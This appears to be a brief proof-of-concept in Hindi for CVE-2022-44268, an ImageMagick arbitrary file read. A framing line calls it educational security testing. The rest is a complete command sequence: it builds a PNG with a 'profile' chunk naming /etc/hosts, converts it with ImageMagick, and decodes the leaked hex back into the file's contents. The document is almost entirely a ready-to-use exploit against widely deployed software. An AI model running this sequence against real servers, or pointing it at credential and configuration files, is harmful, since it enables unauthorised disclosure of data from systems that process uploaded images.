
CVE-2022-44268 ImageMagick मनमानी फ़ाइल पढ़ने की भेद्यता के लिए PoC पेलोड जनरेटर। शैक्षिक सुरक्षा परीक्षण हेतु विशेष रूप से तैयार की गई PNG फ़ाइलों के माध्यम से शोषण (exploitation) का प्रदर्शन करता है।
1. $ apt-get install pngcrush imagemagick exiftool exiv2 -y
2. $ pngcrush -text a "profile" "/etc/hosts" vjp.png
3. $ exiv2 -pS pngout.png
4. $ convert pngout.png gopro.png
5. $ identify -verbose gopro.png
6. $ python3 -c 'print(bytes.fromhex("23202f6574632f686f73740a3132372e302e302e31096c6f63616c686f73740a0a232054686520666f6c6c6f77696e67206c696e65732061726520646573697261626c6520666f7220495076362063617061626c6520686f7374730a3a3a3109096c6f63616c686f7374206970362d6c6f63616c686f7374206970362d6c6f6f706261636b0a666630323a3a3109096970362d616c6c6e6f6465730a666630323a3a3209096970362d616c6c726f75746572730a6475636e740a").decode("utf-8"))'


